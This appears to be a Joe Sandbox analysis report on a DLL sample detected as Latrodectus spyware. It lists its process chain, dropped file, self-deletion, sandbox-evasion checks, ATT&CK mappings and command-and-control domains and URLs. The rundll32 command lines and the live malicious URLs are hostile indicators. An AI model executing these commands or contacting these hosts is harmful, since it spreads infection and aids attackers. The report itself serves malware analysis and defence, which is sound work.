                        Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FFB1E868820 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,3_2_00007FFB1E868820
                        Source: C:\Windows\System32\rundll32.exeFile created: C:\Users\user\AppData\Roaming\Custom_updateJump to behavior
                        Source: C:\Windows\System32\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\runnung
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7488:120:WilError_03
                        Source: r2iL9TLvO3.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\r2iL9TLvO3.dll,extra
                        Source: r2iL9TLvO3.dllVirustotal: Detection: 79%
                        Source: r2iL9TLvO3.dllReversingLabs: Detection: 65%
                        Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\r2iL9TLvO3.dll"
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\r2iL9TLvO3.dll",#1
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\r2iL9TLvO3.dll,extra
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\r2iL9TLvO3.dll",#1
                        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dll", extra
                        Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dll", extra
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\r2iL9TLvO3.dll,follower
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\r2iL9TLvO3.dll,run
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\r2iL9TLvO3.dll",#1Jump to behavior
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\r2iL9TLvO3.dll,extraJump to behavior
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\r2iL9TLvO3.dll,followerJump to behavior
                        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\r2iL9TLvO3.dll,runJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\r2iL9TLvO3.dll",#1Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dll", extra Jump to behavior
                        Source: C:\Windows\System32\loaddll64.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeAutomated click: OK
                        Source: C:\Windows\System32\rundll32.exeAutomated click: OK
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: r2iL9TLvO3.dllStatic PE information: Image base 0x180000000 > 0x60000000
                        Source: r2iL9TLvO3.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                        Source: r2iL9TLvO3.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: C:\Windows\System32\rundll32.exeFile created: C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dllJump to dropped file

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Source: C:\Windows\System32\rundll32.exeFile deleted: c:\users\user\desktop\r2il9tlvo3.dllJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\rundll32.exeCode function: GetAdaptersInfo,GetAdaptersInfo,3_2_00007FFB1E8668E8
                        Source: C:\Windows\System32\rundll32.exeCode function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,3_2_00007FFB1E867FA8
                        Source: C:\Windows\System32\rundll32.exeCode function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,6_2_00007FFB1C817FA8
                        Source: C:\Windows\System32\rundll32.exeCode function: GetAdaptersInfo,GetAdaptersInfo,6_2_00007FFB1C8168E8
                        Source: C:\Windows\System32\rundll32.exeWindow / User API: threadDelayed 657Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeWindow / User API: threadDelayed 8882Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dllJump to dropped file
                        Source: C:\Windows\System32\rundll32.exe TID: 7624Thread sleep count: 56 > 30Jump to behavior
                        Source: C:\Windows\System32\rundll32.exe TID: 7624Thread sleep time: -56000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\rundll32.exe TID: 7636Thread sleep count: 657 > 30Jump to behavior
                        Source: C:\Windows\System32\rundll32.exe TID: 7636Thread sleep time: -65700s >= -30000sJump to behavior
                        Source: C:\Windows\System32\rundll32.exe TID: 7624Thread sleep count: 8882 > 30Jump to behavior
                        Source: C:\Windows\System32\rundll32.exe TID: 7624Thread sleep time: -8882000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FFB1E86A350 FindFirstFileW,FindNextFileW,LoadLibraryW,3_2_00007FFB1E86A350
                        Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FFB1E861A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,3_2_00007FFB1E861A08
                        Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFB1C81A350 FindFirstFileW,FindNextFileW,LoadLibraryW,6_2_00007FFB1C81A350
                        Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFB1C811A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,6_2_00007FFB1C811A08
                        Source: rundll32.exe, 00000006.00000002.2557574678.000001B8F4BA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MWrod_VMware_SATA_CD00#4&224f42ef&
                        Source: rundll32.exe, 00000003.00000002.1294789039.000001ED788D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rod_VMware_SATA_CD00#4&22-00a0c91efb8b}\Device\C806e6f6e6963}\DosDevices\D:V
                        Source: rundll32.exe, 00000006.00000002.2557574678.000001B8F4C0B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2557574678.000001B8F4C35000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2482822204.000001B8F4C10000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2557574678.000001B8F4BF5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: rundll32.exe, 00000006.00000002.2557574678.000001B8F4BA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rod_VMware_SATA_CD00#4&22-00a0c91efb8b}\Device\C806e6f6e6963}\DosDevices\D:oW
                        Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_3-4086
                        Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_6-3588
                        Source: C:\Windows\System32\loaddll64.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\r2iL9TLvO3.dll",#1Jump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FFB1E868AE0 GetUserNameA,wsprintfA,3_2_00007FFB1E868AE0
                        Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00007FFB1E868560 RtlGetVersion,GetVersionExW,3_2_00007FFB1E868560

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: r2iL9TLvO3.dll, type: SAMPLE
                        Source: Yara matchFile source: 6.2.rundll32.exe.7ffb1c810000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.rundll32.exe.1ed7a460000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.rundll32.exe.7ffb1e860000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.rundll32.exe.1ed7a460000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000003.1294422202.000001ED7A460000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.2556577168.00000081943F8000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7620, type: MEMORYSTR
                        Source: Yara matchFile source: decrypted.binstr, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dll, type: DROPPED

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: r2iL9TLvO3.dll, type: SAMPLE
                        Source: Yara matchFile source: 6.2.rundll32.exe.7ffb1c810000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.rundll32.exe.1ed7a460000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.rundll32.exe.7ffb1e860000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.rundll32.exe.1ed7a460000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000003.1294422202.000001ED7A460000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000002.2556577168.00000081943F8000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7620, type: MEMORYSTR
                        Source: Yara matchFile source: decrypted.binstr, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dll, type: DROPPED
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                        Scheduled Task/Job
                        1
                        Scheduled Task/Job
                        11
                        Process Injection
                        1
                        Masquerading
                        OS Credential Dumping111
                        Security Software Discovery
                        Remote Services1
                        Archive Collected Data
                        11
                        Encrypted Channel
                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault AccountsScheduled Task/Job1
                        DLL Side-Loading
                        1
                        Scheduled Task/Job
                        2
                        Virtualization/Sandbox Evasion
                        LSASS Memory2
                        Virtualization/Sandbox Evasion
                        Remote Desktop ProtocolData from Removable Media1
                        Ingress Tool Transfer
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                        DLL Side-Loading
                        11
                        Process Injection
                        Security Account Manager1
                        Process Discovery
                        SMB/Windows Admin SharesData from Network Shared Drive2
                        Non-Application Layer Protocol
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                        Rundll32
                        NTDS1
                        Application Window Discovery
                        Distributed Component Object ModelInput Capture113
                        Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        DLL Side-Loading
                        LSA Secrets1
                        Account Discovery
                        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        File Deletion
                        Cached Domain Credentials1
                        System Owner/User Discovery
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                        System Network Configuration Discovery
                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                        File and Directory Discovery
                        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow12
                        System Information Discovery
                        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1469006 Sample: r2iL9TLvO3.exe Startdate: 08/07/2024 Architecture: WINDOWS Score: 100 29 winarkamaps.com 2->29 31 stratimasesstr.com 2->31 35 Multi AV Scanner detection for domain / URL 2->35 37 Found malware configuration 2->37 39 Antivirus detection for URL or domain 2->39 41 8 other signatures 2->41 8 loaddll64.exe 1 2->8         started        10 rundll32.exe 2->10         started        signatures3 process4 process5 12 rundll32.exe 2 8->12         started        16 cmd.exe 1 8->16         started        18 conhost.exe 8->18         started        20 2 other processes 8->20 file6 27 C:\Users\user\AppData\...\Update_8c0cffeb.dll, PE32+ 12->27 dropped 43 Deletes itself after installation 12->43 22 rundll32.exe 12 12->22         started        25 rundll32.exe 16->25         started        signatures7 process8 dnsIp9 33 winarkamaps.com 188.114.96.3, 443, 49708, 49709 CLOUDFLARENETUS European Union 22->33

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        r2iL9TLvO3.dll80%VirustotalBrowse
                        r2iL9TLvO3.dll66%ReversingLabsWin64.Spyware.Latrodectus
                        r2iL9TLvO3.dll100%AviraTR/Agent.dxjic
                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dll100%AviraTR/Agent.dxjic
                        C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dll66%ReversingLabsWin64.Spyware.Latrodectus
                        C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dll80%VirustotalBrowse
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        winarkamaps.com20%VirustotalBrowse
                        stratimasesstr.com18%VirustotalBrowse
                        SourceDetectionScannerLabelLink
                        https://winarkamaps.com/q100%Avira URL Cloudmalware
                        https://winarkamaps.com/live/comp100%Avira URL Cloudphishing
                        https://stratimasesstr.com/F100%Avira URL Cloudmalware
                        https://winarkamaps.com/live/100%Avira URL Cloudmalware
                        https://winarkamaps.com/live/al100%Avira URL Cloudmalware
                        https://stratimasesstr.com/live/l100%Avira URL Cloudphishing
                        https://winarkamaps.com/%100%Avira URL Cloudmalware
                        https://stratimasesstr.com/100%Avira URL Cloudmalware
                        https://winarkamaps.com/live/18%VirustotalBrowse
                        https://winarkamaps.com/m/=100%Avira URL Cloudmalware
                        https://stratimasesstr.com/live/$100%Avira URL Cloudphishing
                        https://stratimasesstr.com/live/100%Avira URL Cloudmalware
                        https://winarkamaps.com/100%Avira URL Cloudmalware
                        https://winarkamaps.com/live/F100%Avira URL Cloudmalware
                        https://stratimasesstr.com/18%VirustotalBrowse
                        https://winarkamaps.com/live/F17%VirustotalBrowse
                        https://winarkamaps.com/20%VirustotalBrowse
                        https://stratimasesstr.com/live/16%VirustotalBrowse
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        winarkamaps.com
                        188.114.96.3
                        truetrueunknown
                        stratimasesstr.com
                        unknown
                        unknowntrueunknown
                        NameMaliciousAntivirus DetectionReputation
                        https://winarkamaps.com/live/true
                        • 18%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        https://stratimasesstr.com/live/true
                        • 16%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://winarkamaps.com/qrundll32.exe, 00000006.00000002.2557574678.000001B8F4C49000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        https://winarkamaps.com/live/alrundll32.exe, 00000006.00000002.2557574678.000001B8F4BF5000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        https://winarkamaps.com/live/comprundll32.exe, 00000006.00000002.2557574678.000001B8F4C49000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: phishing
                        unknown
                        https://stratimasesstr.com/Frundll32.exe, 00000006.00000002.2557574678.000001B8F4C49000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://stratimasesstr.com/live/lrundll32.exe, 00000006.00000002.2557574678.000001B8F4C49000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        unknown
                        https://winarkamaps.com/%rundll32.exe, 00000006.00000002.2557574678.000001B8F4C49000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        https://stratimasesstr.com/rundll32.exe, 00000006.00000002.2557574678.000001B8F4C49000.00000004.00000020.00020000.00000000.sdmptrue
                        • 18%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        https://winarkamaps.com/m/=rundll32.exe, 00000006.00000002.2557574678.000001B8F4C49000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        https://stratimasesstr.com/live/$rundll32.exe, 00000006.00000002.2557574678.000001B8F4C49000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        unknown
                        https://winarkamaps.com/rundll32.exe, 00000006.00000003.2482822204.000001B8F4C10000.00000004.00000020.00020000.00000000.sdmptrue
                        • 20%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        https://winarkamaps.com/live/Frundll32.exe, 00000006.00000002.2557574678.000001B8F4C0B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2482822204.000001B8F4C10000.00000004.00000020.00020000.00000000.sdmptrue
                        • 17%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        unknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        188.114.96.3
                        winarkamaps.comEuropean Union
                        13335CLOUDFLARENETUStrue
                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1469006
                        Start date and time:2024-07-08 11:38:23 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 4m 56s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:17
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:r2iL9TLvO3.dll
                        (renamed file extension from exe to dll, renamed because original name is a hash value)
                        Original Sample Name:9645a12079edffd20560d4631160a6052ae5728d6f73b7366588166ad281c534.exe
                        Detection:MAL
                        Classification:mal100.troj.winDLL@15/1@2/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 59
                        • Number of non-executed functions: 30
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        TimeTypeDescription
                        06:41:08API Interceptor5291034x Sleep call for process: rundll32.exe modified
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        188.114.96.3purchase order_pdf.exeGet hashmaliciousFormBookBrowse
                        • www.evoolihubs.shop/fwdd/?MdEl=K/pqHoAOWNF4P+w91QXSNI32+N7yog1OarJgSNepE9X9MW/JWlOOpIGlAtDTMDCyfqCkO2QB+3/EX24VIjMTes4MJP5Wyr3Pze4srZjnfJQNxaR/LCxeJK4=&cv4D=Bv0xSH88iTF48zS0
                        475bc80ba1e4ac7b2f40f2a3e1a677a2ccf1ad7f5e5d5.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                        • 651186lm.nyashmyash.top/pipeRequestSecurePacketlowbigloaddefaultTempUploadsTemporary.php
                        4LPk0o7T6C.exeGet hashmaliciousFormBookBrowse
                        • www.mainz-cruise-deals.today/rn94/?CZbDp=fTeDovxhSZ2T70J&2ds=09eGDPUJepCFUU6E4tGoUe5x4dgTJ3zXonwB9AX7AS4ixaR6NbPwPSgI2hlgq7bEBXzd
                        xj40xovMsm.exeGet hashmaliciousAsyncRAT, AveMaria, Keyzetsu Clipper, MicroClip, PureLog Stealer, RL STEALER, RedLineBrowse
                        • auth.xn--conbase-sfb.xyz/api.php?{B955B2CC07A01546086603}
                        Kxjf9xfVcb.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                        • 911628cm.nyashka.top/imagevideopipehttpLowgameBigloadmultidleLocal.php
                        327vRde1h3nsEEG.exeGet hashmaliciousFormBookBrowse
                        • www.gemaroke2.shop/mc10/?qR-LsrxH=cH0r006G1k9BH3Prdi0o8oeF8aabeeFKkLVVuPEC0gCNiYJWCEK9irK+mrJ5aktgxtn1&TVm0xb=yj88DTHplR0
                        http://www.telegramkv.com/Get hashmaliciousUnknownBrowse
                        • www.telegramkv.com/
                        Scan405.exeGet hashmaliciousFormBookBrowse
                        • www.jjjw.xyz/ypml/
                        AuT5pFGTFw.exeGet hashmaliciousFormBookBrowse
                        • www.coinwab.com/efdt/
                        http://business.ifbsmetaiidentiityconfirms.com/meta-community-standard100068928266341/Get hashmaliciousHTMLPhisherBrowse
                        • business.ifbsmetaiidentiityconfirms.com/favicon.ico
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        winarkamaps.comGLKJoBXIVE.dllGet hashmaliciousLatrodectusBrowse
                        • 104.21.37.64
                        Util.dllGet hashmaliciousBazar Loader, LatrodectusBrowse
                        • 172.67.205.12
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        CLOUDFLARENETUSSHIPMENT-CMA CGM XIAMEN-1DBSIE1PL- EX1-DOCX.exeGet hashmaliciousFormBookBrowse
                        • 23.227.38.32
                        Arc453466701.msiGet hashmaliciousUnknownBrowse
                        • 104.21.76.57
                        Arc453466701.msiGet hashmaliciousMetamorfoBrowse
                        • 104.21.76.57
                        Arc453466701.msiGet hashmaliciousMetamorfoBrowse
                        • 104.21.76.57
                        https://ywg2216-my.sharepoint.com/:u:/g/personal/sumit_sumitdh_com/EZl7EZYIO7ZIh3sekEg3b7gBpng2Rorpmgh8B7EtlV-PZg?e=CU642GGet hashmaliciousUnknownBrowse
                        • 1.1.1.1
                        https://germaine-de-capuccini.co.ukGet hashmaliciousUnknownBrowse
                        • 104.21.16.44
                        https://accounts.binance.com/bg/register?ref=YY80CKRNGet hashmaliciousUnknownBrowse
                        • 104.18.32.137
                        Shipping Documents.exeGet hashmaliciousFormBookBrowse
                        • 172.64.152.166
                        https://email.abad-ca.com/owa1/##aoc3481@hdel.co.krGet hashmaliciousHTMLPhisherBrowse
                        • 188.114.96.3
                        dlcdkJcbbV.exeGet hashmaliciousLummaC, RedLineBrowse
                        • 188.114.96.3
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousVidarBrowse
                        • 188.114.96.3
                        Rhino 8 KG.rarGet hashmaliciousUnknownBrowse
                        • 188.114.96.3
                        a77d4e10359c589b166ac047f2d3448badc7e07381496dcfab21b73f7ac49b81_payload.exeGet hashmaliciousVidarBrowse
                        • 188.114.96.3
                        SecuriteInfo.com.Trojan.PWS.Stealer.39021.26401.10948.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                        • 188.114.96.3
                        file.exeGet hashmaliciousVidarBrowse
                        • 188.114.96.3
                        file.exeGet hashmaliciousPython Stealer, Amadey, LummaC Stealer, Mars Stealer, Monster Stealer, PureLog Stealer, RedLineBrowse
                        • 188.114.96.3
                        4x21uza5Ws.exeGet hashmaliciousVidarBrowse
                        • 188.114.96.3
                        SecuriteInfo.com.Variant.Babar.372873.20811.19091.exeGet hashmaliciousUnknownBrowse
                        • 188.114.96.3
                        SecuriteInfo.com.Variant.Babar.372873.20811.19091.exeGet hashmaliciousUnknownBrowse
                        • 188.114.96.3
                        vrUmCwNelo.dllGet hashmaliciousDridex DropperBrowse
                        • 188.114.96.3
                        No context
                        Process:C:\Windows\System32\rundll32.exe
                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):61440
                        Entropy (8bit):5.602203637771727
                        Encrypted:false
                        SSDEEP:768:f0Io0O99dyyus8GhrFuNtxv4c/HFGKndcHrqzwzv1NTNaTWsyih:caO9qyVNKv4c/HFGLlzvi
                        MD5:D46476F7F27BE8EF618B7646A46F5E66
                        SHA1:8219D1EAD31D16F6380941827BF96A488453D5C0
